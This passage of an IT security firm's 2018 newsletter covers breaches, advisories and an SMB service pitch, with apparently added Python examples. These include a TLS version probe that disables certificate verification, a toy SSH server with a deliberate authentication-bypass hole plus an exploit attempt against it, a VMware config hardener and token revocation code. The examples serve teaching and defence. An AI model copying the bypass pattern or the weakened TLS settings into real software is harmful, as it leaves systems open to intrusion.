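LEGACY_VERSIONS = (ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1)
MIN_ACCEPTABLE = ssl.TLSVersion.TLSv1_2


def allows_legacy_tls(minimum: ssl.TLSVersion) -> bool:
    """True if a context whose floor is `minimum` would still accept TLS 1.0/1.1.
    TLSVersion is an IntEnum and MINIMUM_SUPPORTED is -2, so it sorts below every
    real version and is correctly reported as allowing legacy protocols."""
    return minimum < MIN_ACCEPTABLE


def context_allows_legacy(ctx: ssl.SSLContext) -> bool:
    """Same check applied to an existing context."""
    return allows_legacy_tls(ctx.minimum_version)


def hardened_client_context() -> ssl.SSLContext:
    """Default verified context with the floor pinned at TLS 1.2, matching what
    the browsers will enforce in 2020."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = MIN_ACCEPTABLE
    return ctx


def probe_tls_versions(host: str, port: int = 443, timeout: float = 5.0) -> Dict[str, bool]:
    """One handshake per version with minimum == maximum pinned, so the server
    cannot negotiate anything else. Certificate checks are off because only
    version support is being measured. A False for TLS 1.0/1.1 can also mean the
    local OpenSSL refused to offer it; SECLEVEL=0 is requested so that, where the
    library permits, the legacy suites those versions need are still offered."""
    results: Dict[str, bool] = {}
    for version in (*LEGACY_VERSIONS, ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        try:
            ctx.minimum_version = version
            ctx.maximum_version = version
            if version in LEGACY_VERSIONS:
                ctx.set_ciphers("DEFAULT:@SECLEVEL=0")
        except (ValueError, ssl.SSLError):
            results[version.name] = False   # local library cannot even offer it
            continue
        try:
            with socket.create_connection((host, port), timeout=timeout) as sock:
                with ctx.wrap_socket(sock, server_hostname=host) as tls:
                    results[version.name] = tls.version() is not None
        except (ssl.SSLError, OSError):
            results[version.name] = False
    return results


if __name__ == "__main__":
    # Assumed target; substitute one of your own services.
    print(probe_tls_versions("example.com"))
```

Run the probe from inside your network against internal services as well as public ones; the vendors' figures only describe browser traffic to the internet, and internal appliances and legacy applications are where the old versions tend to survive.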

SSH Flaw allows Unauthenticated Access to Systems

If you run Unix, Linux or network systems you will be familiar with the Secure Shell protocol, known as SSH. SSH is most commonly used as a remote management command line tool for securely accessing server or network device consoles for administrative purposes.

This week a serious flaw in the open source SSH library libssh was disclosed. A vulnerability in the libssh server code allows malicious actors to successfully connect to a device listening for SSH connections without the need for authentication. By sending a crafted message during the SSH connection, the actor can convince the device that it has already authenticated, removing the need to provide a valid user name and password.

This bug applies only to libssh, and only where libssh is used to implement the server side of a connection; it does not affect the far more widely deployed OpenSSH. If any of your systems use libssh, update to the fixed releases (0.8.4 or 0.7.6) as soon as possible. Also keep in mind that IoT and network devices may be running vulnerable embedded versions of libssh, which would require a device firmware upgrade to remove this threat.

https://nakedsecurity.sophos.com/2018/10/17/serious-ssh-bug-lets-crooks-log-in-just-by-asking-nicely/

And that's it for this week, please don't forget to tune in for our next instalment.
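A worked illustration of the libssh flaw described above, added here and not libssh's own code. The libssh advisory attributed the bug to the server accepting SSH2_MSG_USERAUTH_SUCCESS (message number 52), a message only a server should ever send, from the client. The toy state machine below reproduces that shape of mistake: the vulnerable server registers one handler table for both roles, so a client that sends message 52 is marked authenticated; the hardened version only ever sets the flag inside its own credential check and treats any message the client has no business sending as a protocol error. The message numbers are the real SSH ones; the classes, the user table and the credential format are constructed for the example.

```python
"""Added example, not libssh's code: a simplified server-side SSH userauth
state machine showing the class of bug behind the libssh flaw, beside a
version that only grants access after verifying credentials."""
import hmac
from typing import Dict, Optional

MSG_USERAUTH_REQUEST = 50   # client -> server: "here are my credentials"
MSG_USERAUTH_FAILURE = 51   # server -> client
MSG_USERAUTH_SUCCESS = 52   # server -> client: ONLY the server should send this


class ProtocolError(Exception):
    """Raised by the hardened server when the client breaks the protocol."""


def check_credentials(users: Dict[str, str], payload: dict) -> bool:
    """Constant-time password check; unknown users and missing fields fail."""
    expected = users.get(payload.get("user"))
    supplied = payload.get("password")
    if expected is None or supplied is None:
        return False
    return hmac.compare_digest(expected.encode(), str(supplied).encode())


class VulnerableAuthServer:
    """One dispatch table serves both directions, so a client that sends
    MSG_USERAUTH_SUCCESS flips the session to authenticated."""

    def __init__(self, users: Dict[str, str]):
        self.users = users
        self.authenticated = False
        self.handlers = {
            MSG_USERAUTH_REQUEST: self._on_request,
            MSG_USERAUTH_SUCCESS: self._on_success,   # belongs to the client role
        }

    def _on_request(self, payload: dict) -> int:
        if check_credentials(self.users, payload):
            self.authenticated = True
            return MSG_USERAUTH_SUCCESS
        return MSG_USERAUTH_FAILURE

    def _on_success(self, payload: dict) -> Optional[int]:
        self.authenticated = True        # takes the peer's word for it
        return None

    def handle(self, msg_type: int, payload: dict) -> Optional[int]:
        handler = self.handlers.get(msg_type)
        return handler(payload) if handler else None


class HardenedAuthServer:
    """`authenticated` only becomes True inside the credential check, and any
    message the client must not send ends the session."""

    CLIENT_MAY_SEND = {MSG_USERAUTH_REQUEST}

    def __init__(self, users: Dict[str, str]):
        self.users = users
        self.authenticated = False

    def handle(self, msg_type: int, payload: dict) -> int:
        if msg_type not in self.CLIENT_MAY_SEND:
            raise ProtocolError(f"unexpected message type {msg_type} from client")
        if check_credentials(self.users, payload):
            self.authenticated = True
            return MSG_USERAUTH_SUCCESS
        return MSG_USERAUTH_FAILURE


def exploit_attempt(server) -> bool:
    """Send the message only a server should send; report whether we are now 'in'."""
    try:
        server.handle(MSG_USERAUTH_SUCCESS, {})
    except ProtocolError:
        pass
    return server.authenticated


if __name__ == "__main__":
    users = {"admin": "correct horse battery"}   # constructed credential store
    print("vulnerable server authenticated us:", exploit_attempt(VulnerableAuthServer(users)))
    print("hardened server authenticated us:  ", exploit_attempt(HardenedAuthServer(users)))
```

The general lesson is that a protocol implementation should keep separate handler tables per role, and that the "authenticated" state should have exactly one writer, the code that verified a credential.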

Sign Up

Ironshare – Security Simplified

Edition #13 – 19th October 2018

By Stuart Hare on 19/10/18

Cyber Round-up

Cyber Round-up for 12th October

Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.

Why security is everyone's problem

October is an important time of the year in cyber security as it marks European Cyber Security Month (ECSM). ECSM is a campaign that runs from the 1st to the 31st of October every year to promote awareness of cyber security among both businesses and the general public.

The objectives of the ECSM include providing general cyber awareness and promoting safer internet use for everyone. Each campaign is typically aligned to a general theme or message. This year's theme is 'Cyber security is a shared responsibility!'.

Too many times we see individuals and organisations making the same mistakes, primarily due to a lack of awareness and education. They focus their security purely on technology, focus only on the external threat, or, in the case of organisations, make the IT department solely responsible for cyber and information security.

All of these are bad decisions, and if we consider that most IT departments, and even IT companies, are still not properly trained or educated in cyber security, we can see how they end in tears.

The reality is that people remain the biggest threat, and thus the weakest link, in cyber security today.

A common error is to think that attackers won't target you because you have nothing of value, or your business is too small to be attacked. This couldn't be farther from the truth. Every individual has an identity and personal information that is of immense value to a cybercriminal. Combine that with the ever-increasing breach notifications released on a weekly basis (recent breaches include Facebook, Instagram and British Airways), and any one of us could become a target at any time.

Email is still the biggest cause of compromise; commonly cited industry figures put email and phishing behind over 95% of successful attacks. Most people have at least one email account, so it only takes one person to fall victim to a phishing email for our network and systems to be compromised.

Although not a silver bullet, cyber awareness aims to educate the masses, stopping people from being click-happy and getting them to pause and consider whether they should, or really need to, click that disguised malicious email link masquerading as their bank, supplier or cloud provider.

If you are ever in doubt it is safer to delete the email and NEVER click any links.

Whether it's to protect your organisation's network and data, or your home network and personal devices, we need to educate our families, friends and co-workers to use good practice when using technology and the internet. We need to realise that this is not just IT's, or someone else's, problem. If we all work together, maybe then we can start to truly share the responsibility for cyber security.

@CyberSecMonth
#CyberSecurityAwarenessMonth
https://cybersecuritymonth.eu/about-ecsm/whats-ecsm

Cyber-attack costs UK Council £2m

Copeland Borough Council, located in Cumbria, has revealed that the cyber-attack which compromised its systems in August 2017 has racked up costs of approximately £2 million, but it will never know whether it was the ultimate target, as it hosts the Sellafield nuclear site.

The August Bank Holiday attack infected multiple UK borough councils with a new, previously unseen variant of ransomware, which encrypted the council's files and demanded a ransom in Bitcoin. The impact on the council was huge, making it impossible to carry out day-to-day activities.

It is understood that the council was without basic IT functionality for approximately 10 weeks, which had a huge knock-on impact on other systems such as finance and payroll. Land registry charges, planning and providing fuel for the fleet all suffered, homes could not be purchased, and the backlog of council tax and business rates cases reached more than 8,000.

Copeland's chief executive said: "We will never know if we were targeted because we host the largest nuclear site in Europe and are home to 80% of the UK's nuclear waste. But we are of the view that this was a sustained, resourced professional attack. This wasn't a spotty kid in a bedroom. It was an interstate attack."

The extent of the attack meant that systems and processes were not fully restored until February 2018.

This is another example of a successful attack enabled by a lack of cyber awareness and training, pressing home the shared responsibility for cyber security. Copeland have since introduced multiple measures to improve their security, including mandatory cyber security training for all staff and members.

Earlier this year a report by Big Brother Watch said that it had received responses from 395 local authorities; 114 had said their systems had been breached, 25 reported they had experienced a data loss or breach as a result, and the majority of successful cyber-attacks began with so-called phishing emails designed to trick staff into revealing passwords and other data.

As a result of generally poor local authority cyber practices and a number of high-profile attacks, the NCSC, in collaboration with the DCMS and iDEA, is conducting a series of assessments across all UK local authorities, with the goal of improving their security posture and bringing them in line with the Cyber Essentials baseline.

https://local.gov.uk/copeland-borough-council-managing-cyber-attack

VMware DoS Vulnerability

This week VMware disclosed a security vulnerability, rated Important, in its virtualisation hypervisor software that can result in a denial of service.

VMware vSphere ESXi, VMware Workstation and VMware Fusion are all vulnerable to this flaw, which is found in the 3D-acceleration feature. An attacker with standard user privileges on a guest virtual machine can cause an infinite loop in the 3D rendering shader, making the guest VM unresponsive. This is not isolated to a single VM: the same issue can affect other guests, and the physical host running them can also become unresponsive.

This vulnerability only exists if the 3D-acceleration feature is enabled. ESXi has this feature disabled by default, while on Workstation and Fusion it is enabled by default.

There is no security update to fix this issue; the workaround is simply to disable the 3D-acceleration feature, as described in the knowledge base links below. VMware state: “There is no patch for this issue, customers must review their risk and apply the workarounds if applicable.”

Workstation and Fusion: https://kb.vmware.com/s/article/59146
ESXi security hardening guides: https://www.vmware.com/in/security/hardening-guides.html
Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0025.html

And that's it for this week, please don't forget to tune in for our next instalment.
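An audit script for the VMware workaround above, added here and not VMware's own tooling. It parses the `key = "value"` lines of a .vmx file, reports whether 3D acceleration is on, and writes a hardened copy. The setting name `mks.enable3d` is the one VMware's knowledge base article documents for this workaround; the sample .vmx contents are constructed, and the default-when-absent behaviour is passed in by the caller because Workstation and Fusion enable the feature by default while ESXi does not.

```python
"""Added example, not VMware's code: find and switch off 3D acceleration in
.vmx files. mks.enable3d is the key VMware's KB documents for the workaround;
the sample file below is constructed."""
import re
from typing import Dict, Tuple

SETTING = "mks.enable3d"
# key = "value"  (quotes are optional in practice, so they are optional here)
_LINE = re.compile(r'^\s*([\w.:\-]+)\s*=\s*"?([^"]*)"?\s*$')


def parse_vmx(text: str) -> Dict[str, str]:
    """Turn key = "value" lines into a dict; comments and blank lines are skipped."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _LINE.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2)
    return settings


def three_d_enabled(settings: Dict[str, str], default_enabled: bool) -> bool:
    """Report the effective state. `default_enabled` is what the product does
    when the key is absent: True for Workstation/Fusion, False for ESXi."""
    value = settings.get(SETTING)
    if value is None:
        return default_enabled
    return value.strip().upper() == "TRUE"


def harden_vmx(text: str) -> Tuple[str, bool]:
    """Return (new_text, changed). Rewrites an existing mks.enable3d line in
    place, or appends one, so the feature is off regardless of product default."""
    lines = text.splitlines()
    changed = False
    found = False
    for i, line in enumerate(lines):
        m = _LINE.match(line)
        if m and m.group(1).lower() == SETTING:
            found = True
            if m.group(2).strip().upper() != "FALSE":
                lines[i] = f'{SETTING} = "FALSE"'
                changed = True
    if not found:
        lines.append(f'{SETTING} = "FALSE"')
        changed = True
    return "\n".join(lines) + "\n", changed


# Constructed sample of a Workstation VM with 3D acceleration switched on.
SAMPLE_VMX = """\
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "14"
displayName = "build-agent-01"
mks.enable3d = "TRUE"
svga.graphicsMemoryKB = "786432"
"""

if __name__ == "__main__":
    print("3D enabled:", three_d_enabled(parse_vmx(SAMPLE_VMX), default_enabled=True))
    fixed, changed = harden_vmx(SAMPLE_VMX)
    print("changed:", changed)
    print(fixed)
```

Apply the change with the VM powered off, since the .vmx is re-read at power-on, and keep a copy of the original; the script deliberately returns the new text rather than overwriting a file so you can diff it first.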

Sign Up

Ironshare – Security Simplified

Edition #12 – 12th October 2018

By Stuart Hare on 12/10/18

Cyber Round-up

Cyber Round-up for 5th October

Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.

Bloomberg Bombshell on China’s US infiltration

Thursday 4th October appears to have been a big day for the cyber community, with the release of some big stories, none seemingly bigger than the Bloomberg Businessweek bombshell that alleges mass infiltration of major US companies by China.

Bloomberg Businessweek's piece, “The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies”, provides an in-depth account of a top secret 3-year probe into how a tiny, pencil-tip-sized microchip was allegedly implanted on the computer motherboards of up to 30 US companies.

With China manufacturing approximately 75% of the world's mobile phones and PCs, it should be no surprise that it would be in a strong position to launch this otherwise very difficult type of hardware attack. It is claimed that operatives from the People's Liberation Army (PLA) used the motherboard provider Supermicro, whose customers included Apple and Amazon, to have these chips installed during the motherboard manufacturing process.

If true, this attack has very far-reaching consequences, as it would have affected hardware and servers used by Apple, Amazon, the US Department of Defense, CIA drone operations, Navy warships, banks and government contractors.

Amazon and Apple have denied these reports, stating they are unaware of any such compromise or investigation. Bloomberg counters that several former senior US national security officials confirmed the investigation, which began during the Obama administration. It is worth noting that Supermicro, Apple and Amazon all issued detailed denials, and both the NCSC and the US Department of Homeland Security have said they have no reason to doubt those statements, so the specifics of the report should be treated as unconfirmed.

According to the report, a method was developed during the investigation to monitor the chips' activity without revealing to the attackers that the chip had been found. During months of monitoring, brief check-in communications between the attackers and the compromised servers were detected, but no attempts to remove any data were witnessed.

US investigation officials stated: “In Supermicro, China's spies appear to have found a perfect conduit for what U.S. officials now describe as the most significant supply chain attack known to have been carried out against American companies.”

“Think of Supermicro as the Microsoft of the hardware world. Attacking Supermicro motherboards is like attacking Windows. It's like attacking the whole world.”

NCSC confirms Russian state sponsored attacks

A news post released by the NCSC on the 4th of October exposes the ongoing campaign of cyber-attacks carried out by the Russian military intelligence service, the GRU. The post confirms that several known actor groups that have been operating around the world are in fact the GRU.

Groups that the NCSC has confirmed are associated with the GRU are well known in the community, and include Fancy Bear, APT28, Strontium and CyberCaliphate.

Jeremy Hunt, the UK Foreign Secretary, stated:

“The GRU’s actions are reckless and indiscriminate: they try to undermine and interfere in elections in other countries; they are even prepared to damage Russian companies and Russian citizens.

This pattern of behaviour demonstrates their desire to operate without regard to international law or established norms and to do so with a feeling of impunity and without consequences.

Our message is clear: together with our allies, we will expose and respond to the GRU’s attempts to undermine international stability.”

The post covers several attacks attributed to the GRU over the past 3 years, including the BadRabbit and VPNFilter attacks.

https://www.ncsc.gov.uk/news/reckless-campaign-cyber-attacks-russian-military-intelligence-service-exposed

Further news articles and press conferences followed throughout Thursday, in which the British and Dutch governments' joint operations confirmed they had hard evidence of these cyber activities, including Russia's attempted hack of the UK Foreign Office.

Patience with Russia is wearing thin. The UK is prepared and committed to continue working with its allies to apply and maintain pressure in countering these Russian activities, which NATO has described as “a reckless pattern of behaviour, including the use of force against its neighbours”.

Facebook Hacked - 50 Million users face potential compromise

Last Friday Facebook admitted that an unknown actor group had exploited a zero-day vulnerability in their social media platform that allowed them to access and exfiltrate the access tokens of more than 50 million users. These are the secret tokens that keep you logged into your Facebook account and the applications that use it.

Technical details of the attack have not been disclosed by Facebook, but they have confirmed that it related to three distinct bugs in the ‘View As’ feature code (which allows people to view what their own profile looks like to someone else) and that the vulnerability has been patched.

As a precaution, Facebook has forcibly reset the access tokens of over 90 million users, which logs out all current sessions and initiates the login process when the app is next used.

Unfortunately, this is not isolated to the Facebook service alone: if you use your Facebook account to log in to third-party applications or sites such as Instagram, Tinder and many others, those sessions will have been affected too.

Facebook VP Guy Rosen explained: “The way this works is: let’s say I’m logged into the Facebook mobile app and it wants to open another part of Facebook inside a browser, what it will do is use that single sign-on functionality to generate an access token for that browser, so that means you don’t have to login again on that window.”

Rosen also stated that the attackers did not get access to or steal user passwords, so unless you are one of the 90 million logged-out users you should not be affected and will not need to change your password. The reason a token reset rather than a password reset was the right response is that access tokens are bearer credentials: whoever holds one is that user as far as the API is concerned, with no password required, so the only way to lock the attackers out is to invalidate the tokens themselves.

https://newsroom.fb.com/news/2018/09/security-update/
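The mass token reset described above, as an added example that is not Facebook's code and does not describe how Facebook's tokens are built. It shows one common way to make "log everyone out" a single cheap operation: each access token is signed server-side and carries the user's current token generation number, and revoking all of a user's sessions just increments that number, so every outstanding token fails validation without the server having to store or search for them. The signing key, users, lifetimes and the token layout are constructed for the example.

```python
"""Added example, not Facebook's code: HMAC-signed bearer tokens with a
per-user generation counter so one call invalidates every outstanding
session. Key, users and token format are constructed."""
import base64
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional

SERVER_KEY = secrets.token_bytes(32)   # assumption: one server-side signing key
SIG_LEN = hashlib.sha256().digest_size  # raw HMAC-SHA256 is 32 bytes


class TokenService:
    def __init__(self, key: bytes = SERVER_KEY, lifetime: int = 3600):
        self.key = key
        self.lifetime = lifetime
        self.generation: Dict[str, int] = {}   # user -> current token generation

    def _sign(self, body: bytes) -> bytes:
        return hmac.new(self.key, body, hashlib.sha256).digest()

    def issue(self, user: str, now: Optional[float] = None) -> str:
        """Mint a bearer token: user | generation | expiry, then the HMAC."""
        now = time.time() if now is None else now
        gen = self.generation.setdefault(user, 1)
        body = f"{user}|{gen}|{int(now) + self.lifetime}".encode()
        return base64.urlsafe_b64encode(body + self._sign(body)).decode()

    def validate(self, token: str, now: Optional[float] = None) -> Optional[str]:
        """Return the user the token belongs to, or None if it is forged,
        malformed, expired, or predates the user's last revoke_all()."""
        now = time.time() if now is None else now
        try:
            raw = base64.urlsafe_b64decode(token.encode())
            body, sig = raw[:-SIG_LEN], raw[-SIG_LEN:]
            user, gen_s, exp_s = body.decode().split("|")
            gen, exp = int(gen_s), int(exp_s)
        except (ValueError, UnicodeDecodeError):
            return None
        if not hmac.compare_digest(sig, self._sign(body)):
            return None                       # forged or tampered
        if exp < now:
            return None                       # expired
        if gen != self.generation.get(user, 0):
            return None                       # revoked: a newer generation exists
        return user

    def revoke_all(self, user: str) -> None:
        """The 'log everyone out' lever: bump the generation. Every token issued
        under the old number now fails validate(), with nothing stored per token."""
        self.generation[user] = self.generation.get(user, 1) + 1


if __name__ == "__main__":
    svc = TokenService()
    t = svc.issue("alice")
    print("valid before reset:", svc.validate(t))
    svc.revoke_all("alice")
    print("valid after reset: ", svc.validate(t))
```

In a real deployment the generation counter lives wherever user records live, and the same trick extends to a global reset by mixing a site-wide epoch into the signed body; what it cannot do is revoke a single session selectively, which needs per-session state.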

Cisco IOS XE and ASA Vulnerabilities

Cisco have disclosed a High severity vulnerability in their IOS XE and ASA Firepower Threat Defense (FTD) code that could allow an unauthenticated attacker to force an affected device to reload.

The vulnerability exists in the IPsec driver of multiple products, such as the ASR and ISR routers running IOS XE and the ASA 5500-X series firewalls running Firepower Threat Defense.

By sending malformed IPsec packets using ESP (Encapsulating Security Payload) or AH (Authentication Header) that are processed by an affected device, a remote attacker can exploit this vulnerability and cause a reload of the device.

It is recommended that you update your devices to the latest fixed software versions provided by Cisco. For more information and a breakdown of the affected products and software, see the link below.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180926-ipsec

New Linux Kernel bug allows Root access

Right on the back of last week's round-up, Linux is in the headlines again with a second kernel flaw in a week.

This latest vulnerability, CVE-2018-17182, was discovered by Jann Horn, a researcher at Google Project Zero, and affects the Linux memory management code in kernel versions 3.16 to 4.18.8.

Horn explains that it results from an overflow in the VMA (virtual memory area) cache, which can be exploited in a number of different ways, opening the door to privilege escalation, root access and arbitrary code execution.

As this affects numerous Linux distributions, including Red Hat, Debian, Ubuntu and Android, it is recommended that you review your current OS and patch accordingly.

Threatpost's coverage of this vulnerability can be found here: https://threatpost.com/another-linux-kernel-bug-surfaces-allowing-root-access/137800/

It's been a huge week for news in cyber security, with some big pieces that I am sure will roll on for some time; please do tune in for our next instalment.

Sign Up

Ironshare – Security Simplified

Edition #11 – 5th October 2018

By Stuart Hare on 5/10/18

Products and Services

Smaller businesses - Don't ignore IT Security...

Data breaches that compromise hundreds of thousands (or even millions) of records tend to grab the most headlines, and we only get to hear about them when large organisations admit their failures (which is not always the case).

The true scale of the problem is not really known, as breaches can often be swept under the carpet; it's not great for business to acknowledge you've had inadequately protected systems.

Just in the last couple of months we've seen several major breaches in the UK alone, with household brands such as T-Mobile, Superdrug, Butlins and British Airways getting hacked.

Just try googling “security breaches” and you will be inundated with news stories from around the world of companies being attacked. Just recently we even heard that Facebook had been infiltrated.

More and more smaller scale businesses are under attack

Don't be fooled by the big names though, as small and medium-sized businesses (SMBs) are far from immune to cyberattacks. Just last month we saw that being a small business situated just off the west coast of Scotland, on the Isle of Arran, does not matter in the world of cybercrime.

The Arran Brewery were recruiting for new employees and suddenly had lots of interest after the advertisement was posted on an international jobs site. They started getting several emails a day, all with attached CVs, and in amongst the genuine job seekers there was malware embedded within a CV. When it was opened by a staff member the malware took effect, and the software started to encrypt their systems and backups.

The brewery faced a ransom demand: pay up for a key to decrypt the files or face losing their data. They brought in cyber security specialists who removed the malware and restored some of the systems, but not all. They appear to have lost a lot of data.

Time To Detection (TTD)

It was interesting to note that their anti-virus (AV) protection software did not pick up the attack. This is a common problem, as traditional AV solutions rely on signature updates being created and pushed out to machines, sometimes with the aid of the users themselves. It can also take the AV software companies quite some time to detect a threat in the wider world (known as the "Time To Detection" or "TTD"), after which they can address the problem and get critical updates out to customers.

Faster time to detection is critical to minimise damage from intrusions, and one of the reasons we are Cisco partners is because they have successfully lowered their TTD to as low as nine hours (compared to the industry average of around 100 days). That's quite a difference.

Cisco’s “Small and Mighty” is a special report that indicates 53% of midmarket (or medium sized) businesses have experienced a security breach, which should be an alarming figure for anyone responsible for IT within a small or medium sized business.

What would downtime mean for your business?

40% of those who were breached had over 8 hours of downtime.

You can see the full report here, it’s an interesting read.

It won’t happen to us…. will it?

The larger enterprises invest fortunes and recruit security teams to handle cybersecurity, so it's no surprise that cybercriminals may find it easier to take the path of least resistance and target small and medium-sized businesses instead.

If you think your business is too small to be targeted by a hacker, then you should think again. If your business handles any financial information or valuable data about your customers, then you're a target for cyberattacks.

Some simple advice

One very simple recommendation is to back up your data frequently, and to keep more than one copy. If you're outsourcing your IT to a third party, make sure they are keeping at least two or three backups in different places, including at least one copy that is offline or otherwise not writable from your network, so that ransomware which reaches your systems cannot also encrypt the backups, as happened to the brewery above. Data loss can be devastating and literally bring a business to the brink of closure.

Whilst some small businesses don't see the need to spend on cybersecurity, it's not the place for SMBs to cut costs. If you don't take cybersecurity seriously, and one day you're forced to pay £10,000 in bitcoin to (hopefully) unlock your data, you'll regret that approach.

That's where we come in. At Ironshare we realise that budgets are tight, so we provide security services at an affordable and realistic price.

Check out your IT provider or support teams

Your own IT staff or support company will no doubt provide the basics, such as routine system monitoring, software upgrades, training on new systems and services, help desk support and so on, but they may not have any specialist security knowledge. It's hard for a typical business or IT provider to find and retain security staff, and problems can start if you don't have people dedicated to security on a daily basis.

The Ironshare Managed Security Service

Ironshare are an MSSP (Managed Security Service Provider), and our fully qualified team can enable small businesses to outsource their cyber security protections for a flexible monthly or annual fee. We'll help you to assess your people, process, technology and practices and put together a plan that will see immediate benefits. Our services are backed by industry-leading Cisco solutions that are reliable, well-implemented tools and technologies.

If you'd like a "proof-of-concept" period before signing up, then we can arrange a free trial to showcase our services. Simply enter your details on our Contact page.

Ironshare – Security, Simplified.

By James Phipps on 3/10/18


Ironshare is a provider of Information and Cyber Security services.
